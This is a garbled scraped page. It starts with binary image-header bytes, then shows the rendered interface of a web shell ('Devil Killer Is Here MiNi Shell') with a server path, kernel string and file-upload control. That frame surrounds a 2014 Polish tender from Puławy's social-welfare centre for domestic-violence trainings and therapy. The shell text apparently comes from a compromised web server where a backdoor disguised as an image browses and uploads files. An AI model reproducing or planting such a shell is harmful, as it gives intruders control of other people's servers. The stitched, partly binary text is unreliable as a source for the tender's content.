JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20141017/347936-N-2014.html

<p class="kh_header"><b>Puławy: zorganizowanie i przeprowadzenie dziewięciu szkoleń w ramach Projektu Wiem, umiem, mogę przeciwdziałać przemocy</b><br>
<b>Numer ogłoszenia: 347936 - 2014; data zamieszczenia: 17.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Leśna 17, 24-100 Puławy, woj. lubelskie, tel. 81 458 62 01, faks 81 458 62 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.pulawy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zorganizowanie i przeprowadzenie dziewięciu szkoleń w ramach Projektu Wiem, umiem, mogę przeciwdziałać przemocy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Miejsce realizacji zamówienia: dla wszystkich części w Puławach.
Termin wykonania zamówienia: 
* w części nr 1  Terapii grupowej dla osób doznających przemocy luty - lipiec 2015r.
* w części 2 Terapii rodzinnej dla osób doznających przemocy czerwiec - lipiec 2015r.
* w części nr 3 Treningu kompetencji i umiejętności społecznych dla kobiet doznających przemocy- listopad 2014 r.
* w część nr 4 Treningu kompetencji i umiejętności społecznych dla mężczyzn stosujących przemoc-luty 2015r.
* w części nr 5 Programu korekcyjno - edukacyjnego dla osób stosujących przemoc    w rodzinie marzec-sierpień 2015 r.
* w części nr 6 Grupy robocze w praktyce- luty 2015r.
* w części  nr 7 Pomoc dziecku krzywdzonemu- kwiecień 2015 r.
* w części  nr 8 Strategie udzielania pomocy osobie dorosłej doznającej przemocy -marzec 2015 r.
* w części nr 9 Strategie postępowania z osobami stosującymi przemoc- marzec 2015 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia ten warunek, jeżeli wykaże, że na czas realizacji zamówienia będzie dysponował:
w części nr 1  Terapii grupowej dla osób doznających przemocy
osobą z wykształceniem wyższym psychologicznym i uprawnieniami terapeuty (czyli z certyfikatem, zaświadczeniem lub dyplomem ukończenia kursu, szkoły lub studiów podyplomowych), a także mającą 
co najmniej 5 - letnie doświadczenie zawodowe jako psycholog, w tym min. 2 letnie doświadczenie w pracy  z osobami doświadczającymi przemocy.
w części 2 Terapii rodzinnej dla osób doznających przemocy
osobą z wykształceniem wyższym psychologicznym i uprawnieniami terapeuty (czyli z certyfikatem, zaświadczeniem lub dyplomem ukończenia kursu, szkoły lub studiów podyplomowych), a także mającą co najmniej 5 - letnie doświadczenie zawodowe jako psycholog, w tym min. 2 - letnie doświadczenie w pracy  z osobami doświadczającymi przemocy.
w części nr 3 Treningu kompetencji i umiejętności społecznych dla kobiet doznających przemocy osobą z wykształceniem wyższym psychologicznym i uprawnieniami trenera umiejętności miękkich ( czyli z certyfikatem, zaświadczeniem lub dyplomem ukończenia kursu, szkoły lub studiów podyplomowych), a także mającą doświadczenie w przeprowadzeniu co najmniej 100 godzin dydaktycznych  szkoleń o zakresie tematycznym dotyczącym przeciwdziałania przemocy  w rodzinie w przeciągu ostatnich 3 lat przed upływem terminu składania ofert.
w część nr 4 Treningu kompetencji i umiejętności społecznych dla mężczyzn stosujących przemoc osobą z wykształceniem wyższym i uprawnieniami trenera umiejętności miękkich (czyli z certyfikatem, zaświadczeniem lub dyplomem ukończenia kursu, szkoły lub studiów podyplomowych), a także mającą doświadczenie w przeprowadzeniu co najmniej 100 godzin dydaktycznych  szkoleń o zakresie tematycznym dotyczącym przeciwdziałania przemocy  w przeciągu ostatnich 3 lat przed upływem terminu składania ofert.

w części nr 5 Programu korekcyjno - edukacyjnego dla osób stosujących przemoc w rodzinie Jednym mężczyzną i jedną kobietą, gdzie każde z nich:
A) ukończyło studia II stopnia na jednym z kierunków: psychologia, pedagogika, pedagogika specjalna, nauki o rodzinie, politologia, politologia i nauki społeczne w zakresie pedagogiki opiekuńczo-wychowawczej, resocjalizacji lub pracy socjalnej, albo na innym kierunku uzupełnionym studiami podyplomowymi w zakresie psychologii, pedagogiki, resocjalizacji. 
B) posiada zaświadczenie o ukończeniu szkoleń w zakresie przeciwdziałania przemocy w rodzinie w wymiarze co najmniej 100 godzin, w tym w wymiarze co najmniej 50 godzin  w zakresie pracy z osobami stosującymi przemoc w rodzinie. 
C)posiada co najmniej 3-letni staż pracy w instytucjach realizujących zadania na rzecz przeciwdziałania przemocy w rodzinie. 
Osoby prowadzące program muszą spełniać wyżej wymienione wymogi prawne dotyczące realizacji programów korekcyjno - edukacyjnych dla osób stosujących przemoc, w tym § 9 Rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 22 lutego 2011r. (Dz. U. z dnia 8 marca 2011r. Nr 50 poz. 259) w sprawie standardu podstawowych usług świadczonych przez specjalistyczne ośrodki wsparcia dla ofiar przemocy w rodzinie, kwalifikacji osób zatrudnionych w tych ośrodkach, szczegółowych kierunków prowadzenia oddziaływań korekcyjno - edukacyjnych wobec osób stosujących przemoc w rodzinie oraz kwalifikacji osób prowadzących oddziaływania korekcyjno - edukacyjne.

w części nr 6 Grupy robocze w praktyce
A)trenerem czyli osobą  z wykształceniem wyższym i uprawnieniami trenera umiejętności miękkich (czyli z certyfikatem, zaświadczeniem lub dyplomem ukończenia kursu, szkoły lub studiów podyplomowych)a także mającą doświadczenie w przeprowadzeniu co najmniej 50 godzin dydaktycznych  szkoleń o zakresie tematycznym dotyczącym przeciwdziałania przemocy  
w przeciągu ostatnich 3 lat.
B) oraz osobą prowadzącą blok prawny z wykształceniem wyższym prawniczym i posiadającą co najmniej 3-letnie doświadczenie w pracy w obszarze przeciwdziałania przemocy w rodzinie.

w części  nr 7 Pomoc dziecku krzywdzonemu 
Osobą  z wykształceniem wyższym i uprawnieniami trenera (czyli z certyfikatem, zaświadczeniem lub dyplomem ukończenia kursu, szkoły lub studiów podyplomowych) a także mającą doświadczenie
 w przeprowadzeniu co najmniej 50 godzin dydaktycznych  szkoleń o zakresie tematycznym dotyczącym przeciwdziałania przemocy  w przeciągu ostatnich 3 lat.

w części  nr 8 Strategie udzielania pomocy osobie dorosłej doznającej przemocy
Osobą  z wykształceniem wyższym i uprawnieniami trenera (czyli z certyfikatem, zaświadczeniem lub dyplomem ukończenia kursu, szkoły lub studiów podyplomowych) a także mającą doświadczenie 
w przeprowadzeniu co najmniej 50 godzin dydaktycznych  szkoleń o zakresie tematycznym dotyczącym przeciwdziałania przemocy  w przeciągu ostatnich 3 lat.

w części nr 9 Strategie postępowania z osobami stosującymi przemoc
Osobą  z wykształceniem wyższym i uprawnieniami trenera (czyli z certyfikatem, zaświadczeniem lub dyplomem ukończenia kursu, szkoły lub studiów podyplomowych) a także mającą doświadczenie w przeprowadzeniu co najmniej 50 godzin dydaktycznych  szkoleń o zakresie tematycznym dotyczącym przeciwdziałania przemocy  w przeciągu ostatnich 3 lat.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>formularz oferty ( według wzoru stanowiący załącznik nr 3 SIWZ) 
Pełnomocnictwo jeżeli dotyczy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której wybrano wykonawcę polegającej na zmianie:
1)terminu rozpoczęcia lub zakończenia szkolenia wywołanej w szczególności nie skompletowaniem na czas pełnej grupy szkoleniowej lub z powodu nagłej i znacznej ilości rezygnacji przez uczestników szkolenia oraz wystąpienia wyjątkowych sytuacji -jedynie za zgodą Zamawiającego;
2)w kadrze dydaktycznej, gdy konieczność jej dokonania wynika z przyczyn losowych, niezależnych od Wykonawcy. Jeżeli Zamawiający uzna, że przyczyna jest uzasadniona Wykonawca musi przedstawić nową kandydaturę o kwalifikacjach spełniających kryteria zawarte w SIWZ;
3)miejsca realizacji zajęć, gdy konieczność jej dokonania wynika w wyjątkowych sytuacjach, niezależnych od Wykonawcy. Zmiana ta nie może prowadzić do obniżenia wymagań technicznych i funkcjonalnych;
4)ceny - cena jednostkowa będzie mogła ulec zmianie na skutek zmiany stawek podatkowych, dla przedmiotu zamówienia, wystąpienie o zmianę cen jednostkowych przez Wykonawcę musi odbyć się wyprzedzeniem, nie później niż 7 dni przed proponowaną data zmiany ceny;
5)wynagrodzenia Wykonawcy za zrealizowane szkolenie może nastąpić wyłącznie w przypadku:
a) rezygnacji z udziału w szkoleniu osoby zakwalifikowanej na szkolenie- przed rozpoczęciem zajęć z przyczyn od niej niezależnych lub z powodu podjęcia przez nią zatrudnienia. Zamawiający w takim przypadku dokona dodatkowej kwalifikacji na dane szkolenie, a w przypadku braku takiej możliwości zapłata za szkolenie nastąpi za ilość osób faktycznie przeszkolonych;
b) rezygnacji z udziału w szkoleniu uczestników - po rozpoczęciu szkolenia, z przyczyn od niego niezależnych w trakcie trwania szkolenia. Zapłata za szkolenie wyżej wymienionej osoby będzie obejmowała faktycznie poniesione koszty pomocy dydaktycznych, oraz pozostałe koszty, proporcjonalnie do okresu faktycznego uczestnictwa tej osoby w szkoleniu, na podstawie zestawienia kosztów opracowanego przez Wykonawcę, które to zestawienie zostanie przedłożone przez Wykonawcę do zaakceptowania  przez Zamawiającego.
6) Dopuszczalne są wszelkie zmiany nieistotne rozumiane w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienia ani na wynik postępowania. Takimi zmianami są zmiany o charakterze administracyjno-organizacyjnym umowy np. zmiany dotyczące nazwy, siedziby wykonawcy lub jego formy organizacyjno-prawnej w trakcie trwania umowy, zmiana innych danych identyfikacyjnych, zmiany prowadzące do poprawy oczywistych omyłek pisarskich i rachunkowych w  treści umowy.
7) Zmiany wprowadzone do umowy będą obowiązywały po podpisaniu odpowiedniego aneksu przez obie strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mops.pulawy.pl/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej ul. Leśna 17, 24-100 Puławy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2014 godzina 08:00, miejsce: Miejski Ośrodek Pomocy Społecznej ul. Leśna 17, 24-100 Puławy, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Wiem, umiem, mogę przeciwdziałać przemocy
w ramach Funduszy Małych Grantów dla Programu
Przeciwdziałanie przemocy w rodzinie i przemocy ze względu na płeć.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Terapia grupowa dla osób doznających przemocy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas trwania terapii: 60 godz. zegarowych (1h = 60 minut) przez okres 6-ściu miesięcy (jedno dwugodzinne spotkanie w tygodniu).
Liczba grup: 1 grupa dziesięcioosobowa.
Miejsce szkolenia: Puławy.
Termin szkolenia:  luty - lipiec 2015r.
Liczba osób prowadzących terapię: 1 osoba.
Uczestnicy szkolenia: 10 osób wyłonionych z grup wsparcia, wymagających dalszych działań pomocowych.
W ramach usługi szkoleniowej wykonawca:
* zapewni salę szkoleniową wraz z możliwością zorganizowania cateringu, oznaczoną plakatem promującym Projekt.
* zapewni catering podczas każdego spotkania dla uczestników oraz trenera (napoje różnorodne: kawa mielona i rozpuszczalna, herbata  w torebkach  jednorazowych, cukier, śmietanka, serwetki - bez ograniczeń oraz woda mineralna gazowana i niegazowana w 0,5 litrowych  butelkach; kruche ciasteczka - różne rodzaje (min. 3 rodzaje, po 15 dkg na osobę każdego dnia)
* zapewni trenera i jego  wynagrodzenie
* opracuje i przygotuje materiały edukacyjne (skrypt tematyczny, notatnik, długopis)
* ubezpieczy uczestników szkolenia od następstw nieszczęśliwych wypadków na czas trwania zajęć- kopie polisy ubezpieczeniowej przekaże Zamawiającemu wraz z protokołem odbioru usługi.
* przygotuje i przekaże Zamawiającemu pełną dokumentację szkoleniową, zgodną z prawem krajowym, unijnym oraz ustaleniami zawartymi w umowie z Zamawiającym (dzienniki zajęć, listy obecności potwierdzające obecność na zajęciach, listę potwierdzającą catering, listy potwierdzające odbiór materiałów edukacyjnych, listy potwierdzające odbiór zaświadczeń o ukończeniu terapii, ksero zaświadczeń ologowanych , ksero polisy ubezpieczającej)
*przeprowadzi ankiety ewaluacyjne( które będą zatwierdzone przez koordynatora projektu) wraz z ich analizą i oceną
* wykona i przekaże Zamawiającemu zdjęcia wykonane podczas zajęć na  dowolnym nośniku danych. (np CD, DVD ,pamięć USB karta pamięci)
* przygotuje oraz wręczy uczestnikom zaświadczenia ukończenia szkolenia zawierające  informację   i ologowanie wskazujące na finansowanie z funduszy norweskich. Wzór zaświadczenia zostanie skonsultowany z Koordynatorem Projektu.
* niezwłocznie  poinformuje koordynatora projektu o nie zgłoszeniu się uczestnika na zajęciach, przerwaniu zajęć lub rezygnacji z uczestnictwa oraz innych sytuacjach, które mają wpływ na realizację programu zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Terapia rodzinna dla osób doznających przemocy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas trwania terapii: 20 godz. zegarowych (1h = 60 minut) przez okres dwóch miesięcy. 
Liczba grup: max 10 osób z dziećmi.
Miejsce szkolenia: Puławy.
Termin szkolenia:  czerwiec - lipiec 2015r.
Liczba osób prowadzących terapię: 1 osoba.
Uczestnicy: 10 osób wyłonionych z grup wsparcia i uczestniczących w terapii grupowej oraz ich dzieci. 
W ramach usługi szkoleniowej wykonawca:
*	zapewni salę szkoleniową wraz z możliwością zorganizowania cateringu, oznaczonej plakatem promującym Projekt. zapewni trenera i jego  wynagrodzenie;
*	opracuje i przygotuje materiały edukacyjne (skrypt tematyczny, notatnik, długopis);
*	ubezpieczy uczestników szkolenia od następstw nieszczęśliwych wypadków na czas trwania zajęć-kopie polisy ubezpieczeniowej przekaże Zamawiającemu wraz z protokołem odbioru usługi.
*	zapewni catering podczas każdego spotkania dla uczestników oraz trenera (napoje różnorodne: kawa mielona i rozpuszczalna, herbata   w torebkach  jednorazowych, cukier, śmietanka, serwetki - bez ograniczeń oraz woda mineralna gazowana i niegazowana w 0,5 litrowych  butelkach; kruche ciasteczka - różne rodzaje (min. 3 rodzaje, po 15 dkg na osobę każdego dnia);
*	przygotuje i przekaże Zamawiającemu pełną dokumentację szkoleniową, zgodną z prawem krajowym, unijnym oraz ustaleniami zawartymi w umowie z Zamawiającym (dzienniki zajęć, listy obecności potwierdzające obecność na zajęciach, listę potwierdzającą catering, listy potwierdzające odbiór materiałów edukacyjnych, listy potwierdzające odbiór zaświadczeń o ukończeniu terapii, ksero zaświadczeń ologowanych , ksero polisy ubezpieczającej);
*	niezwłocznie  poinformuje koordynatora projektu o nie zgłoszeniu się uczestnika na zajęciach, przerwaniu zajęć lub rezygnacji z uczestnictwa oraz innych sytuacjach, które mają wpływ na realizację programu zajęć;
*	przeprowadzi ankiety ewaluacyjne ( które będą zatwierdzone przez koordynatora projektu) wraz z ich analizą i oceną;
*	wykona i przekaże Zamawiającemu zdjęcia wykonane podczas zajęć na  dowolnym nośniku danych. (np. CD, DVD, pamięć USB karta pamięci);
* przygotuje oraz wręczy uczestnikom zaświadczenia ukończenia szkolenia zawierające  informację  i ologowanie wskazujące na finansowanie z funduszy norweskich. Wzór zaświadczenia zostanie skonsultowany z Koordynatorem Projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Trening kompetencji i umiejętności społecznych dla kobiet doznających przemocy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas trwania szkolenia: 24 godz. dydaktyczne -3 dni( 1h = 45 minut).
Czas zajęć: 8.00 - 15.00 w tym 2 przerwy kawowe po 15 min. i 1 przerwa obiadowa 30 min.
Liczba grup: jedna grupa 16 - osobowa.
Miejsce szkolenia: Puławy.
Termin szkolenia:  listopad 2014 r.
Liczba osób prowadzących szkolenie: 1 osoba.
Uczestnicy szkolenia: kobiety doznające przemocy - uczestniczki grup wsparcia.

W ramach usługi szkoleniowej wykonawca:
*	zapewni salę szkoleniową wraz z możliwością zorganizowania cateringu, oznaczonej plakatem promującym Projekt. zapewni trenera i jego  wynagrodzenie;
*	opracuje i przygotuje materiały edukacyjne (skrypt tematyczny, notatnik, długopis);
